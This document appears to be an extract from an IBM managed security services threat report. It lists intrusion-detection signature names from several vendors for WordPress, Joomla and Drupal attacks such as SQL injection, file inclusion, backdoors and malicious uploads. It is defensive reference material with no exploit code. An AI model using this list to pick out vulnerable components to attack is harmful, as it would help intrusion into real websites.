web_app: Joomla.Webring.Remote.File.Inclusion

Debian.Security.Update.Drupal6.DSA-1930

Debian.Update.drupal6.DSA-1808-1

Drupal

Drupal.BlogAPI.Code.Execution

Drupal.Core.Access.Bypass.And.Arbitrary.Code.Execution.Vulns

Drupal.Core.Access.Bypass.Vulnerability.SA-CORE-2011-002

Drupal.Core.Access.Bypass.Vulnerability.SA-CORE-2011-003

Drupal.Core.Cross-site.Scripting.Vuln.SA-CORE-2011-001

Drupal.Core.database.inc.expandArguments.SQL.Injection

Drupal.Core.Information.Disclosure.Vuln.SA-CORE-2014-002

Drupal.Core.Multiple.Remote.Vulnerabilities

Drupal.Core.Multiple.Vulnerabilities.SA-CORE-2012-002

Drupal.Core.Multiples.Vulnerabilities.SA-CORE-2012-003

Drupal.Core.OpenID.Module.Information.Disclosure

Drupal.Core.XML-RPC.Endpoint.xmlrpc.php.Tags.DoS

Drupal.Core.xmlrpc.php.Internal.Entity.Expansion.DoS

Drupal.Cross-site.Scripting.Multiple.Vulnerabilities

Drupal.Cross.Site.Scripting.Code.Injection.and.Info.Disclosure

Drupal.Denial.of.Service.Vulnerability.SA-CORE-2013-002

Drupal.DoS.Vulnerability.SA-CORE-2013-002

Drupal.Forum.XSS

Drupal.HTML.Injection.and.Information.Disclosure.Vulns

Drupal.IMCE.Module.Arbitrary.File.Deletion

Drupal.Information.Disclosure.Multiple.Vuln.SA-CORE-2012-003

Drupal.Multiple.XSS.and.Access.Bypass.Vulns.SA-CORE-2013-001

Drupal.Script.sites.default.settings.php.Found

Drupal.Services.Module.Key-Based.Access.Authentication.Bypass

Drupal.Theme.System.Template.File.Local.File.Include

Drupal_Login

Fedora.Drupal.Update

Fedora.drupal.Update.FEDORA.2009.0678

Fedora.Drupal.Update.FEDORA.2009.7362.and.7406.and.7315

16



Fedora.Update.drupal-date.FEDORA-2009-8162.2009-8184

Fedora.Update.drupal.FEDORA-2009-13291.FEDORA-2009-13364

Fedora.Update.for.drupal-cck.FEDORA-2010-10200

Fedora.Update.for.drupal-views.FEDORA-2010-10215

Fedora.Update.for.Drupal.FEDORA-2010-12753

Fedora.Update.for.Drupal.FEDORA-2010-3640

Simplenews.Statistics.Module.for.Drupal.Open.Redirect.Vuln

IBM

phpWordPress_SQL_Injection

WordPressTrackbackDoS

WordPress_Adserve_Plugin_SQL_Injection

WordPress_All-in-One_Event_Calendar_Plugin_Multiple_Cross-Site_Scripting

WordPress_Count_Per_Day_Plugin_notes.php_SQL_Injection

WordPress_Cover_WP_Theme_Cross-Site_Scripting

Wordpress_Cross-Site_Scripting

WordPress_Daily_Maui_Photo_Widget_Plugin_wp-dailymaui-widget-control.php_Cross-Site_Scripting

WordPress_edit-post-rows.php_Cros-Site_Scripting

WordPress_feed.php_PHP_Function_Execution

WordPress_FeedList_Plugin_handler_image.php_Cross-Site_Scripting

WordPress_GBK/Big5_Character_Set_SQL_Injection

WordPress_index.php_Information_Leakage

WordPress_invites.php_Cross-Site_Scripting

WordPress_Multiple_base64_Redirection_Cross-Site_Scripting

WordPress_Multiple_Cross-Site_Scripting

WordPress_MU_wpmu-blogs.php_Cross-Site_Scripting

WordPress_myGallery_Plugin_Remote_File_Inclusion

WordPress_Newsletter_Plugin_stnl_iframe.php_SQL_Injection

WordPress_NextGEN_Gallery_Plugin_media-rss.php_Cross-Site_Scripting

WordPress_Organizer_Plugin_admin.php_Cross-Site_Scripting

Wordpress_Page_Flip_Image_Gallery_Plugin_getConfig.php_Path_Traversal

WordPress_Permalinks_Migration_Plugin_Cross-Site_Scripting

WordPress_PHP_SELF_Cross-Site_Scripting

WordPress_Pool_Theme_Cross-Site_Scripting_in_Path

WordPress_Pretty_Link_Plugin_pretty-bar.php_Cross-Site_Scripting

WordPress_p_SQL_Injection

WordPress_Redoable_Theme_index.php_Cross-Site_Scripting

WordPress_Search_Function_SQL_Injection

17



WordPress_SEO_Tools_Plugin_get_download.php_Path_Traversal

WordPress_SQL_Injection

WordPress_templates.php_Cross-Site_Scripting

WordPress_theme.php_Command_Execution

WordPress_Twitter_Feed_Plugin_magpie_debug.php_Cross-Site_Scripting

WordPress_upload.php_Cross-Site_Scripting

WordPress_Upload_File_Plugin_wp-uploadfile.php_SQL_Injection

WordPress_Whois_Search_Plugin_wp-whois-ajax.php_Cross-Site_Scripting

WordPress_wp-comments-post.php_Cross-Site_Scripting

Wordpress_WP-DB_Backup_Plugin_edit.php_Path_Traversal

WordPress_WP-Forum_Plugin_user_parameter_SQL_Injection

WordPress_WP-StarsRateBox_Plugin_wp-starsratebox.php_Cross-Site_Scripting

WordPress_WP-StarsRateBox_Plugin_wp-starsratebox.php_SQL_Injection

WordPress_wp-Table_Plugin_wptable-button.php_Remote_File_Inclusion

WordPress_WP-UserOnline_Plugin_Cross-Site_Scripting

WordPress_WP_Comment_Remix_Plugin_Cross-Site_Scripting

WordPress_WP_Comment_Remix_Plugin_SQL_Injection

WordPress_WP_e-Commerce_Plugin_SQL_Injection

WordPress_WP_Featured_Post_with_Thumbnail_Plugin_timthumb.php_Cross-Site_Scripting

WordPress_WP_Forum_Server_Plugin_feed.php_SQL_Injection

WordPress_WP_Photo_Album_Plugin_wppa.php_Cross-Site_Scripting

WordPress_WP_Survey_And_Quiz_Tool_Plugin_create.php_Cross-Site_Scripting

Joomla MyBlog Component index.php Path Traversal

Joomla! AllVideos Plugin download.php Path Traversal

Joomla! GCalendar Component index.php Path Traversal

Joomla!GCalendarComponentindex.phpPathTraversal

Joomla!_AllVideos_Plugin_download.php_Path_Traversal

Joomla!_Barter_Component_SQL_Injection

Joomla!_Comlantis_Visitors_Google_Map_Component_map_data.php_SQL_Injection

Joomla!_file_upload.php_Remote_File_Inclusion

Joomla!_Gcalendar_Component_index.php_Path_Traversal

Joomla!_Graphics_Component_index.php_Path_Traversal

Joomla!_Highslide_JS_Component_index.php_Path_Traversal

Joomla!_index.php_Cross-Site_Scripting

Joomla!_index.php_Remote_Command_Execution

Joomla!_index.php_Remote_File_Inclusion

Joomla!_ionFiles_Component_download.php_Path_Traversal

Joomla!_joomlaradio_Component_Remote_File_Inclusion

Joomla!_Media_Mall_Factory_Component_index.php_SQL_Injection

Joomla!_NeoRecruit_Component_index.php_SQL_Injection

18



Joomla!_PicSell_Component_index.php_Path_Traversal

Joomla!_pollwindow.php_SQL_Injection

Joomla!_SmartSite_Component_index.php_Path_Traversal

Joomla!_TimeTrack_Component_index.php_SQL_Injection

Joomla!_Time_Track_Component_index.php_SQL_Injection

Joomla_AjaxChat_Component_Remote_File_Inclusion

Joomla_Canteen_Component_index.php_Path_Traversal

Joomla_ccNewsletter_Component_index.php_Path_Traversal

Joomla_Dada_Mail_Manager_Component_config.dadamail.php_Remote_File_Inclusion

Joomla_Dione_Form_Wizard_Component_index.php_Path_Traversal

Joomla_Jgrid_Component_index.php_Path_Traversal

Joomla_Joomla!12Pictures_Component_Remote_File_Inclusion

Joomla_Joomla!FlashFun_Component_Remote_File_Inclusion

Joomla_MyBlog_Component_index.php_Path_Traversal

Joomla_Nice_Talk_Component_index.php_SQL_Injection

Joomla_Pro_Desk_Component_index.php_Path_Traversal

Joomla_redSHOP_Component_index.php_SQL_Injection

Joomla_VirtueMart_Google_Base_Component_admin.googlebase.php_Remote_File_Inclusion

Mambo/Joomla_Multiple_Remote_File_Inclusion

Mambo/Joomla_New_Article_Component_com_articles.php_Remote_File_Inclusion

Multiple_Joomla!_Components_SQL_Injection

Drupal_Ajax_Checklist_Module_SQL_Injection

Drupal_Brilliant_Gallery_Module_SQL_Injection

Drupal_keys_Path_Disclosure

HTTP_Drupal_POST_Form_PHP_Injection

HTTP_Drupal_POST_Form_SQL_Injection

INTRUSHIELD

HTTP: Cross Site Scripting - WordPress RSS Feed Generator self_link HTTP_HOST XSS Scripting

HTTP: PHP Include - Wordpress PHP File Include Vulnerability

HTTP: WordPress Asset-Manager PHP File Upload Vulnerability

HTTP: WordPress cache_lastpostdate Arbitrary Code Execution

HTTP: WordPress FoxyPress Plugin Arbitrary File Upload PHP Code Execution

HTTP: Wordpress PHP File Include Vulnerability

HTTP: WordPress Plugin Advanced Custom Fields Remote File Inclusion

HTTP: WordPress WP-Property PHP File Upload Vulnerability

HTTP: Joomla 1.5.12 TinyBrowser File Upload Code Execution

HTTP: Joomla Akeeba Kickstart Unserialize Remote Code Execution

HTTP: Joomla Component JCE File Upload Remote Code Execution

19



HTTP: Joomla Media Manager File Upload Vulnerability

HTTP: Joomla Webring Component admin.webring.docs.php component_dir Parameter PHP File Include

HTTP: Dries Buytaert Drupal CoreOpenID Module Information Disclosure

HTTP: Drupal Core database.inc Abstraction API SQL Injection

ISS

Wordpress brute-force login attempt

WordPress.BackWPup.Plugin.Directory.Traversal.Vulnerabilities

WordPress.Content.Slide.Plugin.Cross-site.Request.Forgery.Vulne

WordPress.Related.Posts.Plugin.Cross-Site.Request.Vuln

Joomla Component com_virtuemart SQL Injection

Joomla! GCalendar Component index.php Path Traversal

Joomla.Cross-site.Scripting.Multiple.Vulnerabilities

Mambo/Joomla!.Remote.File.Inclusion.Vulnerability

Drupal.Core.Access.Bypass.And.Arbitrary.Code.Execution.Vulns

HTTP_Drupal_POST_Form_PHP_Injection

HTTP_Drupal_POST_Form_SQL_Injection

XML_RPC_Entity_DoS

MCAFEE

HTTP: Wordpress PHP File Include Vulnerability

NETSCREEN

HTTP: WordPress Generic \"ID\" Parameter SQL Injection

HTTP: WordPress Slider Revolution Responsive Plug-In Arbitrary File Download

HTTP: WordPress \"wp-includes\" Path Remote Access

HTTP:PHP:WORDPRESS-COOKIE-INJ

HTTP:PHP:WORDPRESS-JQUERY-LFI

HTTP:PHP:WORDPRESS-MUL-FL-GAL

HTTP:PHP:WORDPRESS-MUL-GND-ALBM

HTTP:PHP:WORDPRESS-OPS-LFI

HTTP:PHP:WORDPRESS-SPEED-RCE

HTTP:PHP:WORDPRESS-SPELCHECK-FI

HTTP:PHP:WORDPRESS-UPLOAD

HTTP:PHP:WORDPRESS-USER-INJ

HTTP:PHP:WORDPRESS-WPCUSTOM-LFI

HTTP:SQL:INJ:WORDPRESS-ID

HTTP:SQL:INJ:WORDPRESS-WP-FRM

20



HTTP:WORDPRESS-W3PLUGIN-RCE

HTTP:INFO-LEAK:JOOMLA-SQLREPORT

HTTP:JOOMLA-MEDIAMGR-FILEUPLOAD

HTTP:JOOMLA-WEBRING-RFI

HTTP:PHP:JOOMLA-ADMIN-SCAN

HTTP:PHP:JOOMLA-COM-COLLECTOR

HTTP:PHP:JOOMLA-COM-PHOCADL-LFI

HTTP:PHP:JOOMLA-DIR-TRAV

HTTP:PHP:JOOMLA-FILE-LISTER

HTTP:PHP:JOOMLA-JCE-FILE-UPLOAD

HTTP:PHP:JOOMLA-JE-STORY-LFI

HTTP:PHP:JOOMLA-JMSFILESELL-LFI

HTTP:PHP:JOOMLA-JOOMTOUCH-LFI

HTTP:PHP:JOOMLA-LOC-FILE

HTTP:PHP:JOOMLA-OBSUGGEST-LFI

HTTP:PHP:JOOMLA-PHP-OBJ-INJ

HTTP:PHP:JOOMLA-XCLONER

HTTP:SQL:INJ:JOOMLA-AD-DJ

HTTP:SQL:INJ:JOOMLA-ALLCINEVID

HTTP:SQL:INJ:JOOMLA-ALPHA-EMAIL

HTTP:SQL:INJ:JOOMLA-AVRELOADED

HTTP:SQL:INJ:JOOMLA-CALCBUILDER

HTTP:SQL:INJ:JOOMLA-CBCONTACT

HTTP:SQL:INJ:JOOMLA-COM-CCBOARD

HTTP:SQL:INJ:JOOMLA-COM-CLAN

HTTP:SQL:INJ:JOOMLA-COM-JCE

HTTP:SQL:INJ:JOOMLA-COM-JOOMNIK

HTTP:SQL:INJ:JOOMLA-COM-SHOP

HTTP:SQL:INJ:JOOMLA-COMHOSPITAL

HTTP:SQL:INJ:JOOMLA-COMTEAM

HTTP:SQL:INJ:JOOMLA-CONTROLLER

HTTP:SQL:INJ:JOOMLA-FAQ-BOOK

HTTP:SQL:INJ:JOOMLA-FILTERORDER

HTTP:SQL:INJ:JOOMLA-FOTO

HTTP:SQL:INJ:JOOMLA-JUICY-PICID

HTTP:SQL:INJ:JOOMLA-MAPLOCATOR

HTTP:SQL:INJ:JOOMLA-MORFEOSHOW

HTTP:SQL:INJ:JOOMLA-NEWSSEARCH

HTTP:SQL:INJ:JOOMLA-QUESTION

HTTP:SQL:INJ:JOOMLA-RESTAURANTE

21



HTTP:SQL:INJ:JOOMLA-VIRTUAL-MEM

HTTP:SQL:INJ:JOOMLA-VIRTUEMART

HTTP:XSS:JOOMLA-CITY

HTTP:XSS:JOOMLA-COM-RESMAN

HTTP:DOS:DRUPAL-XML-RPC-IEE

HTTP:DOS:DRUPAL-XMLRPC-TAGS

HTTP:PHP:DRIES-BUYTRT-DRUPAL-ID

HTTP:XSS:DRUPAL-CUMULAS

PALO ALTO

myGallery Plugin for WordPress Remote File Inclusion Vulnerability

myGallery Plugin for WordPress Remote File Inclusion Vulnerability(33330)

WordPress Asset Manager Plugin File Upload Vulnerability

WordPress Caching Plugins Remote Code Execution Vulnerability

Wordpress Command Execution Backdoor Vulnerability

Wordpress Command Execution Backdoor Vulnerability(31933)

WordPress Cookie Data PHP Code Injection Vulnerability

WordPress Cookie Data PHP Code Injection Vulnerability(30095)

WordPress Cuckootap Theme Arbitrary File Download Vulnerability

WordPress Cuckootap Theme Arbitrary File Download Vulnerability(37363)

Wordpress Download Manager Plugin Unauthenticated File Upload Vulnerability

Wordpress FormCraft Plugin SQL Injection Vulnerability

WordPress Foxypress Plugin uploadify.php Arbitrary File Upload Vulnerability

WordPress Foxypress Plugin uploadify.php Arbitrary File Upload Vulnerability(34864)

Wordpress InfusionSoft Add-On Arbitrary File Upload Vulnerability

Wordpress MailPoet Newsletters Unauthenticated File Upload Vulnerability

Wordpress MailPoet Newsletters Unauthenticated File Upload Vulnerability(37105)

WordPress OptimizePress Arbitrary File Upload Vulnerability

WordPress Pingback XMLRPC Function Denial of Service Vulnerability

WordPress Pingback XMLRPC Function Denial of Service Vulnerability(36873)

WordPress Plugin Quick Post Widget1.9.1 Cross Site Scripting Vulnerability

WordPress PluginQuick Post Widget1.9.1 Cross-site scripting

WordPress RSS Feed Generator self_link HTTP_HOST Cross-Site Scripting Vulnerability

WordPress RSS Feed Generator self_link HTTP_HOST Cross-Site Scripting Vulnerability(32033)

Wordpress Slideoptinprox Plugin Cross Site Scripting Vulnerability

WordPress WP Symposium Plugin PHP Code Injection Vulnerability

WordPress WP-Property Plugin File Upload Vulnerability

Wordpress WPTouch Authenticated File Upload Vulnerability

Joomla Akeeba Unserialize Remote Code Injection Vulnerability

22



Joomla RequestURI index.php URL Parsing Cross-Site Scripting Vulnerability

Joomla TinyBrowser Arbitrary File Upload Vulnerability

Joomla TinyBrowser Arbitrary File Upload Vulnerability(32623)

Joomla Token Authentication Bypass Vulnerability

Joomla Token Authentication Bypass Vulnerability(31982)

Joomla Visites Component Remote File Include Vulnerability

Joomla Visites Component Remote File Include Vulnerability(34439)

Joomla Webring component_dir Parameter PHP File Include Vulnerability

Joomla Webring component_dir Parameter PHP File Include Vulnerability(35010)

Drupal Core API SQL Injection Vulnerability

Drupal Core API SQL Injection Vulnerability(36972)

Drupal Core XML-RPC Endpoint xmlrpc.php Denial of Service Vulnerability

SNORT

BACKDOOR Wordpress backdoor feed.php code execution attempt

BACKDOOR Wordpress backdoor theme.php code execution attempt

DELETED SERVER-WEBAPP Potential hostile executable served from local compromised or malicious WordPress site

INDICATOR-COMPROMISE Wordpress Invit0r plugin non-image file upload attempt

INDICATOR-COMPROMISE Wordpress Request for html file in fgallery directory

INDICATOR-COMPROMISE Wordpress Request for php file in fgallery directory

MALWARE-BACKDOOR Wordpress backdoor feed.php code execution

MALWARE-BACKDOOR Wordpress backdoor theme.php code execution

MALWARE-CNC Potential hostile executable served from compromised or malicious WordPress site

SERVER-OTHER Wordpress linenity theme LFI attempt

SERVER-WEBAPP Potential hostile executable served from local compromised or malicious WordPress site

SERVER-WEBAPP W3 Total Cache for Wordpress access - likely information disclosure

SERVER-WEBAPP Wordpress brute-force login attempt

SERVER-WEBAPP Wordpress cache_lastpostdate code injection attempt

SERVER-WEBAPP wordpress cat parameter arbitrary file execution attempt

SERVER-WEBAPP Wordpress Invit0r plugin php upload attempt

SERVER-WEBAPP WordPress login denial of service attempt

SERVER-WEBAPP WordPress Quick-Post Widget GET request using Body cross-site scripting

SERVER-WEBAPP WordPress Quick-Post Widget POST request cross-site scripting

SERVER-WEBAPP WordPress Super Cache & W3 Total Cache remote code execution attempt

SERVER-WEBAPP Wordpress timthumb.php theme remote file include attack attempt

SERVER-WEBAPP Wordpress wp-banners-lite plugin cross site scripting attempt

SERVER-WEBAPP WordPress XMLRPC potential port-scan attempt

SERVER-WEBAPP WordPress XSS fs-admin.php injection attempt

WEB-PHP Wordpress cache_lastpostdate code injection attempt

23



WEB-PHP wordpress cat parameter arbitrary file execution attempt

SERVER-OTHER Joomla media.php arbitrary file upload attempt

SERVER-OTHER Joomla media.php arbitrary file upload vulnerability

SERVER-WEBAPP JCE Joomla module vulnerable directory traversal or malicious file upload attempt

SERVER-WEBAPP Joomla invalid token administrative password reset attempt

SERVER-WEBAPP Joomla komento extension cross site scripting attempt

SERVER-WEBAPP Joomla media.php file.upload direct administrator access attempt

SERVER-WEBAPP Joomla Remote File Include upload attempt

SERVER-WEBAPP Joomla simple RSS reader admin.rssreader.php remote file include attempt

SERVER-WEBAPP Joomla weblinks-categories SQL injection attempt

WEB-PHP Joomla invalid token administrative password reset attempt

SERVER-WEBAPP Drupal Core OpenID information disclosure attempt

SERVER-WEBAPP Drupal VideoWhisper Webcam plugin XSS attempt

SOURCEFIRE

BACKDOOR Wordpress backdoor feed.php code execution attempt

BACKDOOR Wordpress backdoor theme.php code execution attempt

BLACKLIST DNS request for known malware domain blog.wordpress-catalog.com - Win.Trojan.Soraya

INDICATOR-COMPROMISE Potential Redirect from Compromised WordPress site to Fedex - Spammed Malware

Download attempt

INDICATOR-COMPROMISE Wordpress Request for html file in fgallery directory

INDICATOR-COMPROMISE Wordpress Request for php file in fgallery directory

MALWARE-BACKDOOR Wordpress backdoor feed.php code execution

MALWARE-BACKDOOR Wordpress backdoor theme.php code execution

MALWARE-CNC Php.Malware.SoakSoakRedirect Malware traffic containing WordPress Administrator credentials

MALWARE-CNC Potential hostile executable served from compromised or malicious WordPress site

SERVER-OTHER Wordpress linenity theme LFI attempt

SERVER-WEBAPP Potential hostile executable served from local compromised or malicious WordPress site

SERVER-WEBAPP Wordpress brute-force login attempt

SERVER-WEBAPP Wordpress Invit0r plugin php upload attempt

SERVER-WEBAPP Wordpress MailPoet plugin successful theme file upload detected

SERVER-WEBAPP Wordpress MailPoet plugin theme file upload attempt

SERVER-WEBAPP WordPress pingback gethostbyname heap buffer overflow attempt

SERVER-WEBAPP WordPress Super Cache & W3 Total Cache remote code execution attempt

SERVER-WEBAPP Wordpress timthumb.php theme remote file include attack attempt

SERVER-WEBAPP Wordpress timthumb.php webshot source attack attempt

SERVER-WEBAPP Wordpress wp-banners-lite plugin cross site scripting attempt

SERVER-WEBAPP WordPress XMLRPC potential port-scan attempt

SPECIFIC-THREATS Wordpress Request for html file in fgallery directory

24



SPECIFIC-THREATS Wordpress Request for php file in fgallery directory

WEB-PHP Wordpress timthumb.php theme remote file include attack attempt

SERVER-OTHER Joomla media.php arbitrary file upload attempt

SERVER-OTHER Joomla media.php arbitrary file upload vulnerability

SERVER-WEBAPP JCE Joomla module vulnerable directory traversal or malicious file upload attempt

SERVER-WEBAPP Joomla invalid token administrative password reset attempt

SERVER-WEBAPP Joomla media.php file.upload direct administrator access attempt

SERVER-WEBAPP Joomla Remote File Include upload attempt

WEB-PHP Joomla invalid token administrative password reset attempt

TIPPING POINT

10895: HTTP: WordPress Plugin Comment Rating SQL Injection Vulnerability

11566: HTTP: Wordpress TimThumb Plugin Remote Code Execution

12373: HTTP: WordPress admin Login

12423: HTTP: WordPress Login

3910: HTTP: Wordpress Command Injection

4406: HTTP: Wordpress PHP Carriage Return Injection

5181: HTTP: Wordpress 2.1.1 Backdoor Access

5296: HTTP: Wordpress XMLRPC SQL Injection

5413: HTTP: WordPress SQL Injection Vulnerability

5421: HTTP: Wordpress XMLRPC SQL Injection

6408: HTTP: Wordpress SQL Column Truncation Vulnerability

9671: HTTP: WordPress Comment Author URL Cross Site Scripting

HTTP: WordPress SQL Injection Vulnerability

HTTP: Wordpress XMLRPC SQL Injection

12019: HTTP: Joomla XBall SQL Injection Vulnerability

12499: HTTP: Joomla hwdVideoShare Component Arbitrary File Upload Vulnerability

12595: HTTP: Joomla Privilege Escalation Vulnerability

12676: HTTP: Joomla Administrator Login

5513 HTTP: Joomla Search Component Command Execution

5513: HTTP: Joomla Search Component Command Execution

5528 HTTP: Firestorm Joomla com_gmaps SQL Injection

5528: HTTP: Firestorm Joomla com_gmaps SQL Injection

6312: HTTP: Joomla Token Input Validation Vulnerability

6312: HTTP: Joomla Token SQL Injection Vulnerability

6549: HTTP: Joomla Components SQL Injection Vulnerability

6641: HTTP: Joomla Live Chat SQL Injection Vulnerability

9669: HTTP: Joomla RWCards Components File Inclusion Vulnerability

9740: HTTP: Joomla Multi-Venue RestaurantManager SQL Injection Vulnerability

25



TRENDMICRO

Identified Access To WordPress Sensitive Files

Identified Too Many WordPress XML-RPC Pingback Requests

Identified Wordpress Mailpoet Newsletter Plugin Malicious File Upload

WordPress Caching Plugins Remote PHP Code Execution Vulnerability

WordPress Denial Of Service Vulnerability (CVE-2014-9034)

WordPress RSS feed Generator self_link HTTP_HOST Cross-Site Scripting

WordPress Slider Revolution Responsive/Showbiz Pro Responsive Teaser Multiple Security Bypass

Vulnerabilities

Wordpress TimThumb WebShot Remote Code Execution Vulnerability

Wordpress WP Symposium Shell Upload Vulnerability

Wordpress XML-RPC Pingback gethostbyname Heap-based Buffer Overflow Vulnerability

Wordpress XML-RPC XML Denial Of Service Vulnerability

Joomla JCE Extension Multiple Vulnerabilities

DISCLAIMER

This document is intended to inform clients of IBM Security Services of a threat or discovery by IBM Managed

Security Services and measures undertaken or suggested by IBM Security Service Teams to remediate the threat.

The data contained herein describing tactics, techniques and procedures is classified Confidential for the

consumption of IBM MSS clients only.

t r o c m s mss #1 - virtual security operations center · pdf fileresearch and intelligence...

Documents